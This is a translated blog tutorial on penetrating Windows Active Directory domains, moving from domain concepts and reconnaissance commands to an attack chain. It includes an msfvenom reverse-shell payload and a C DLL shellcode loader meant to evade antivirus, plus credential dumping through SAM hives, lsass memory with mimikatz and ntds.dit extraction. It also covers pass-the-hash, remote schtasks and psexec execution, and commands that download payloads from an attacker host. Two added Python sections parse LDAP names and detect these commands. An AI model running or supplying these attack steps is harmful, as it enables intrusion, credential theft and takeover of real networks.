Domain penetration (intranet penetration)

1. Understanding the domain environment

What is a domain

A domain is a form of computer network in which all user accounts, computers, printers and other security principals are registered in a central database held on one or more computers known as domain controllers. Authentication takes place on the domain controller. Each person using a computer in the domain receives a unique user account, which can then be granted access to domain resources. Put another way, a domain is a set of computers in a network that are organised logically together and managed centrally; this logical environment, as opposed to a workgroup, is called a domain.

Domain controller

Once Active Directory (AD) is installed on a machine, that machine becomes a domain controller. A domain can have more than one domain controller, and there is no longer a distinction between a primary and a backup domain controller: every domain controller plays the same role. For example, with three domain controllers you can change a user's permissions on any one of them and the change is replicated to the other two, so if one domain controller fails the whole domain keeps working as long as the other domain controllers are still up.

Active Directory (AD)

Active Directory stores information about network objects and lets administrators and users easily find and use that information. These objects can be users, groups, computers, domain controllers, mailboxes, profiles, organizational units and so on, organised as a tree.

Domain Users

In a domain environment a user's name and password are verified by the domain controllers; once verified, a domain user can log on to any machine in the domain. A plain domain user, however, can only log on to domain machines and look around; it cannot make any changes.

Domain administrator

A domain administrator can log on to the domain controller and holds every right, such as the right to modify any machine in the domain. Domain administrators can push any task or policy to every machine in the domain; they have absolute control over it.

Group

Many employees in a company have the same rights. This is because the domain administrator sorts domain users into different groups and then sets permissions per group, which avoids the trouble of assigning rights to each user individually.

Trusted domains (trust)

In practice a large company may have subsidiaries, so the parent company has a parent domain and each subsidiary has its own domain. How are the parent company's domain and the subsidiaries' domains linked together? By building a trust relationship (trust) between them. If an account from the parent domain should be able to log on in a subsidiary's domain, the subsidiary's domain must establish a trust relationship with the parent domain. When a parent-domain account logs on in the subsidiary's domain, the subsidiary's domain, because it trusts the parent domain, refers the logon to the parent domain's domain controller. Since the parent domain has not established a trust relationship with the subsidiary's domain, an account from the subsidiary's domain cannot log on in the parent company's domain.

nltest /domain_trusts lists the trusted domains; lateral movement inside the domain is often built on these trust relationships.

2. Domain Information Collection

1. nltest: trusted domains

nltest is a tool that ships with the system. Since Windows Server 2003, the domain controller is generally also set up as the primary DNS server, because it needs to resolve domain names. From a workgroup machine we can therefore use nltest to query whether the internal network contains a domain environment.

1. Find the domain controller

ipconfig /all   (the DNS server entry usually points at the domain controller)

2. Find a trusted domain

nltest /domain_trusts /all_trusts /v /server:192.168.0.130

3. Find the IP of a trusted domain

nltest /dsgetdc:XXXXXX /server:192.168.0.130

4. nltest command reference:
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731935(v=ws.11)
https://blog.csdn.net/weixin_34377065/article/details/85597188

1. csvde

csvde is a command-line tool built into Windows Server 2008, located in the %windir%\system32 directory.
It is available when the AD DS or Active Directory Lightweight Directory Services (AD LDS) server role is installed.

The tool applies to:

  • Windows Server 2003
  • Windows Server 2008
  • Windows Server 2003 R2
  • Windows Server 2008 R2
  • Windows Server 2012

Export the directory of the payload.com domain to a CSV file:

csvde -d "DC=payload,DC=com" -f C:\windows\temp\payload.csv

View payload.csv.
LDAP stores its data according to a fixed set of rules (much like a database); this is where domain-related information is kept.

  • Distinguished name (DN): the distinguished name of an entry is called its "dn". Within a directory this name is always unique.
  • CN=Common Name: the user name or server name, up to 80 characters; may be Chinese.
  • OU=Organization Unit: the organizational unit, at most four levels, each level up to 32 characters; may be Chinese.
  • O=Organization: the organization name, 3 to 64 characters.
  • C=Country: the country name, optional, 2 characters.
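As an added example (not from the original post), a small Python parser for the distinguished names found in such an export: it follows the RFC 4514 escaping rules for commas and plus signs, splits a DN into its RDNs, and summarises each entry's leaf name, OU path and DNS domain. The function names and the sample DNs are my own constructions.

```python
# Added example, not from the original post: parse LDAP distinguished names (DNs)
# as they appear in a csvde export and summarise each entry.  Handles the RFC 4514
# escapes (\, and \+) and multi-valued RDNs joined by '+'.  Sample DNs are constructed.
from typing import Dict, List, Tuple

RDN = List[Tuple[str, str]]  # one RDN: [(attribute type, value), ...]


def parse_dn(dn: str) -> List[RDN]:
    """Split a DN into its RDNs, leaf first, unescaping backslash sequences."""
    if not dn.strip():
        return []
    rdns: List[RDN] = []
    current, buf, key, i = [], [], None, 0
    while i < len(dn):
        c = dn[i]
        if c == "\\" and i + 1 < len(dn):      # escaped character: take it literally
            buf.append(dn[i + 1])
            i += 2
            continue
        if c == "=" and key is None:           # end of the attribute type
            key = "".join(buf).strip().upper()
            buf = []
        elif c in ",+":                        # end of one attribute/value pair
            current.append((key, "".join(buf).strip()))
            key, buf = None, []
            if c == ",":                       # ',' also ends the whole RDN
                rdns.append(current)
                current = []
        else:
            buf.append(c)
        i += 1
    current.append((key, "".join(buf).strip()))
    rdns.append(current)
    return rdns


def describe(dn: str) -> Dict[str, object]:
    """Leaf name, OU path from the top of the tree down, and DNS domain from the DC parts."""
    rdns = parse_dn(dn)
    pairs = [p for rdn in rdns for p in rdn]
    ous = [v for k, v in pairs if k == "OU"]
    return {
        "name": rdns[0][0][1] if rdns else "",
        "ou_path": list(reversed(ous)),
        "ou_depth": len(ous),
        "domain": ".".join(v for k, v in pairs if k == "DC"),
    }
```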

2. setspn

The official name of an SPN is "Service Principal Name". Essentially it stores the mapping of the various service resources in the domain: what the service type is, what the machine name is, what the service port is, and so on. With SPNs we can quickly locate all the live hosts of every kind in the current target domain.

setspn -T payload -Q */*

setspn -T payload -Q */* | findstr SQL

Using the host information collected above, we can log on to each target system with a domain administrator account and look around.

3. dnsdump

https://github.com/dirkjanm/adidnsdump
dnsdump -u domain\domainuser -p domainpassword dc-server-name

dnsdump -u payload\Micr067 -p admin@123 WIN-DC.payload.com

https://github.com/3gstudent/Homework-of-Powershell/blob/master/dns-dump.ps1

Powershell -ep bypass -f dns-dump.ps1 -zone payload.com
4. net
net user /domain                         list the domain users
net group "domain admins" /domain        list the domain administrators
net group "domain controllers" /domain   list the domain controllers (there may be several)
net group "domain computers" /domain     list the domain machines
net group /domain                        list the groups in the domain

5. net view
net view                                 list the machines in the same domain
net view \\ip                            list the shares of a given IP
net view \\GHQ                           list the shared resources of the computer GHQ
net view /domain                         show how many domains exist in the internal network
net view /domain:XYZ                     list the machines in domain XYZ

6. nbtscan
nbtscan.exe 192.168.0.1/24
DC in the output marks the domain controller.

3. Domain penetration approach

Lateral movement --- persistence --- password dumping (obtain domain user account passwords) --- domain information collection --- obtain domain admin privileges --- take over the domain controller

1. Weak password brute forcing

Super Weak Password Checker: https://github.com/shack2/SNETCracker

2. Loading shellcode from a DLL to evade AV and get a session
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=1521 LHOST=192.168.245.129 -e x86/shikata_ga_nai -i 11 -f c -o shellcode.c
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp_uuid
msf > set lhost 192.168.245.129
msf > set lport 1521
msf > set EnableStageEncoding true
msf > set StageEncoder x86/fnstenv_mov
msf > exploit

Compile the C program into a DLL and run it on the target machine.

#include <Windows.h>

extern "C" _declspec(dllexport) void __cdecl test(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    MessageBoxW(NULL, L"_Title_", L"Hello", MB_OK);
    unsigned char buf[] = "........replace with the generated shellcode...........";
    void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, buf, sizeof buf);
    ((void(*)())exec)();
    return;
}
3. Reading passwords from the registry

// Save the registry hives

reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv
reg save HKLM\SAM c:\windows\temp\Sam.hiv

// Run the decryption command in mimikatz

lsadump::sam /sam:Sam.hiv /system:Sys.hiv

5. Dump the lsass process memory to obtain hashes
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp

// Run in mimikatz; the results are saved to the log

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

6. Reading passwords with LaZagne

Project URL: https://github.com/AlessandroZ/LaZagne

LaZagne.exe all   run every module and collect all stored password information

7. Obtaining SYSTEM privileges by duplicating a token
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

8. Credential theft

Use tasklist /v to see which user each process runs as; if a process was started by a domain user, the domain admin's credentials can be stolen.

Looking at the credentials saved locally, we can see that a domain administrator's credentials are present. Having stolen the domain administrator's credentials, we can use them to view the service resources stored on the domain controller.

4. Command-line penetration

Reasons to work from the command line rather than remote desktop:
  1. Logging in over remote desktop increases the risk of exposure.
  2. The target's administrator may have disabled remote logon to the server.

1. IPC$

Once an IPC connection is established you can access the target machine's files, upload and download, and run commands on the target. Uploads and downloads use the copy command.

  • First establish the IPC connection
    net use \\192.168.245.130 /u:payload\administrator

  • Copy a file to the target
    copy shell.msi \\192.168.245.130\C$

  • Copy a file from the target machine to the local machine
    copy \\192.168.52.2\C$\shell.msi

2. schtasks scheduled tasks
  • schtasks /create /tn task1 /U domain\domainuser /P domainuserpassword /tr "command or .bat path" /sc ONSTART /s domainmachineIP /RU system
  • schtasks /run /tn task1 /s domainmachineIP /U domain\domainuser /P domainuserpassword
  • schtasks /F /delete /tn task1 /s domainmachineIP /U domain\domainuser /P domainuserpassword
schtasks /create /tn task1 /U payload\administrator /P qwer1234! /tr "c:\windows\system32\cmd.exe /c net user > c:\\windows\\temp\\1.txt" /sc ONSTART /s 192.168.245.130 /RU system
schtasks /Run /tn task1 /s 192.168.245.130 /U payload\administrator /P qwer1234!
schtasks /F /delete /tn task1 /s 192.168.245.130 /U payload\administrator /P qwer1234!
type \\192.168.245.130\C$\windows\temp\1.txt

3. psexec to obtain SYSTEM privileges
Establish an IPC connection before using psexec.
  • net use \\192.168.245.130 /u:payload\administrator
  • PsExec.exe \\192.168.245.130 -s cmd.exe -accepteula
  • -accepteula: the first run shows a licence dialog; this parameter suppresses it.
  • -s: run the remote process with "nt authority\system" privileges
On success you get a command prompt with SYSTEM privileges on the domain controller.

4. Pass-the-hash

Tool download: https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec.exe -hashes :userHash domain/username@targetIP
psexec.exe -hashes :6912928308e3cda903e6d75bd6091a20 payload/administrator@192.168.245.130
5. Downloading files from the Windows command line
  • powershell
    powershell (new-object Net.WebClient).DownloadFile('http://192.168.245.132/a.ps1','D:\phpstudy\WWW\a.ps1')

    Works on Windows 7 and later.

  • certutil
    certutil.exe -urlcache -split -f http://192.168.245.132/msg.dll msg.dll
    certutil.exe -urlcache -split -f http://192.168.245.132/msg.dll delete

    certutil works on Server 2003 and later. Details: https://docs.microsoft.com/en-us/previous-versions/orphan-topics/ws.10/cc773087(v=ws.10)?redirectedfrom=MSDN

  • bitsadmin
    bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.245.132/b.ps1" "D:\\phpstudy\\WWW\\b.ps1"

    bitsadmin works on Windows 7 and later. Details: https://docs.microsoft.com/zh-cn/windows/win32/bits/bitsadmin-tool?redirectedfrom=MSDN

  • vbs
    Method one: write download.vbs directly with echo.
    echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
    echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
    echo Post.Open "GET","http://192.168.245.132/a.ps1",0 >>download.vbs
    echo Post.Send() >>download.vbs
    echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
    echo aGet.Mode = 3 >>download.vbs
    echo aGet.Type = 1 >>download.vbs
    echo aGet.Open() >>download.vbs
    echo aGet.Write(Post.responseBody) >>download.vbs
    echo aGet.SaveToFile "D:/a.ps1",2 >>download.vbs

    Method two: save the script first, then download the specified file with it.

    echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
    cscript downfile.vbs http://192.168.245.132/a.ps1 D:\\tomcat8.5\\webapps\\x.ps1
  • A collection of Windows download-and-execute commands:
    https://xz.aliyun.com/t/1654#toc-6
6. Finding the intranet proxy

Some intranet resources can only be reached through a specific proxy; we can find the proxy IP and port by reading the registry.
View the IE proxy in the registry:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL
7. Using the Windows API
  • An IPC connection must be established before these tools are used
  • NetGroupGetUsers.exe: queries the members of the target server's local administrators group
  • NetLocalGroupGetMembers.exe: queries the members of each group in the domain; the IP must be the domain controller's, any domain user will do
  • NetUserEnum.exe: queries all users on the target server, including hidden users
8. Dumping the domain hashes
  • Windows passwords are stored as hashes in the SAM file.
  • The database file holding the domain's information: c:\windows\ntds\ntds.dit
  • ntds.dit is really just a database, and Microsoft itself provides a set of documented APIs for operating on it: https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx
    Export the ntds.dit file by creating a snapshot.
  • Create the snapshot
    ntdsutil snapshot "activate instance ntds" create quit quit

  • Mount the snapshot
    ntdsutil snapshot "mount {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit
  • Copy ntds.dit
    copy C:\$SNAP_201911241434_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

  • Unmount the snapshot
    ntdsutil snapshot "unmount {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit
  • Delete the snapshot
    ntdsutil snapshot "delete {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" quit quit

  • Obtain the key
    reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv

    Use NTDSDumpEx to obtain the hashes of all domain users

    NTDSDumpEx.exe -d ntds.dit -o hash.txt -s sys.hiv -h

    NTDSDumpEx.exe download: https://github.com/zcgonvh/NTDSDumpEx
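As an added example from the defender's side (not part of the original post), Python detection logic that flags the credential-dumping commands of section 3 and the lateral-movement and download commands of section 4 when they appear in process-creation telemetry such as Security event 4688 or Sysmon event 1 with command-line logging enabled. The names RULES, scan and SAMPLE are my own, and the sample command lines are constructed from the commands on this page.

```python
# Added example, not from the original post: flag the credential-access, lateral-movement
# and download command lines listed on this page when they show up in process-creation
# logs (Security event 4688 / Sysmon event 1).  Sample lines below are constructed.
import re
from typing import List, Tuple

RULES = {
    "SAM/SYSTEM hive export":  re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
    "lsass memory dump":       re.compile(r"procdump.*?-ma\s+lsass", re.I),
    "ntds.dit snapshot":       re.compile(r"ntdsutil.*?\bsnapshot\b", re.I),
    "mimikatz module":         re.compile(r"\b(sekurlsa|lsadump)::", re.I),
    "remote scheduled task":   re.compile(r"schtasks\s+/create.*?\s/s\s+\S+", re.I),
    "psexec as SYSTEM":        re.compile(r"psexec(\.exe)?\s+\\\\\S+.*?\s-s\b", re.I),
    "certutil download":       re.compile(r"certutil.*?-urlcache.*?-f\s+https?://", re.I),
    "bitsadmin download":      re.compile(r"bitsadmin\s+/transfer\b", re.I),
    "WebClient download":      re.compile(r"\.downloadfile\(", re.I),
}


def scan(cmdlines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule name) for every command line that matches a rule."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(cmdlines, 1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((n, name))
    return hits


# Constructed sample: two benign admin commands followed by commands taken from this page.
SAMPLE = [
    "ipconfig /all",
    r'reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer',
    r"reg save HKLM\SAM c:\windows\temp\Sam.hiv",
    r"procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp",
    'ntdsutil snapshot "activate instance ntds" create quit quit',
    r'schtasks /create /tn task1 /U payload\administrator /P <password> /tr "cmd.exe /c whoami" /sc ONSTART /s 192.168.245.130 /RU system',
    r"PsExec.exe \\192.168.245.130 -s cmd.exe -accepteula",
    "certutil.exe -urlcache -split -f http://192.168.245.132/msg.dll msg.dll",
]

if __name__ == "__main__":
    for n, name in scan(SAMPLE):
        print(f"line {n}: {name}")
```

The two benign lines produce no hit, which is the check that matters when tuning rules like these against real 4688 volume.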

 

Origin www.cnblogs.com/micr067/p/11923383.html